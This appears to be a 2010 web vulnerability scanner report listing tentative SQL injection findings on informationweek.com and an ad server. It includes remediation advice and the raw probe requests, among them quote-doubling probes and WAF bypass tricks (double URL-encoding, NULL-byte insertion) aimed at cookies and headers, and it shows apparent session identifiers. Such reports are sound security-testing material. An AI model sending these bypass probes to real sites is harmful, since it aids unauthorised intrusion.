SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights from occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /addyn/3.0/5242.1/1183258/0/225/ADTECH;alias=DarkReading_Blogs_Top_728x90;key=/blog/archives/evil-bytes/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292112011;misc=1292111961408 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E
Response 1
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19230
The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /addyn/3.0/5242.1/1200449/0/225/ADTECH;alias=InformationWeek_Blog_GlobalCIO_Bottom_728x90;key=global_cio+/blog/main/archives/global_cio/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=942859226;misc=1292112032219 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CBBAA326E651A44E171CE41F001514E%00'
Response 1 (redirected)
HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19359
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET / HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:09 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:09 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 105998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <p> Security experts warn those considering joining the pro-WikiLeaks army that it's very easy to trace those who participate in the illegal denial...</p> ...[SNIP]... <P> Microsoft’s failure to get consumer-friendly tablets in stores for the holiday season could result in a frosty year-end quarter for the...</p> ...[SNIP]...
Request 2
GET / HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:12 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:12 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
1.4. http://www.informationweek.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.informationweek.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?1'=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 106016
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <p> Security experts warn those considering joining the pro-WikiLeaks army that it's very easy to trace those who participate in the illegal denial...</p> ...[SNIP]... <P> Microsoft’s failure to get consumer-friendly tablets in stores for the holiday season could result in a frosty year-end quarter for the...</p> ...[SNIP]...
Request 2
GET /?1''=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:39 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:39 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 173030
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's David Berlind's Tech Radar Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><M ...[SNIP]... </a> against Google in the U.S. for alleged illegal data interception.<br /> ...[SNIP]...
Request 2
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:56 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:56 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 173030
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's David Berlind's Tech Radar Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><M ...[SNIP]... </a> against Google in the U.S. for alleged illegal data interception.<br /> ...[SNIP]...
Request 2
GET /blog/main/archives/david_berlinds_tech_radar/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:58 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:58 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:34 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:34 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days';
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days'';
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 165595
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Mobile Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robots" CO ...[SNIP]... <h1>Motorola Seeks To Invalidate Apple Patents</h1> ...[SNIP]...
Request 2
GET /blog/main/archives/mobile/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:03 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:03 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/mobile/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/wolfes_den'/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 58155
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den''/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den''/index.html&gateway=true
Connection: close
Content-Type: text/html
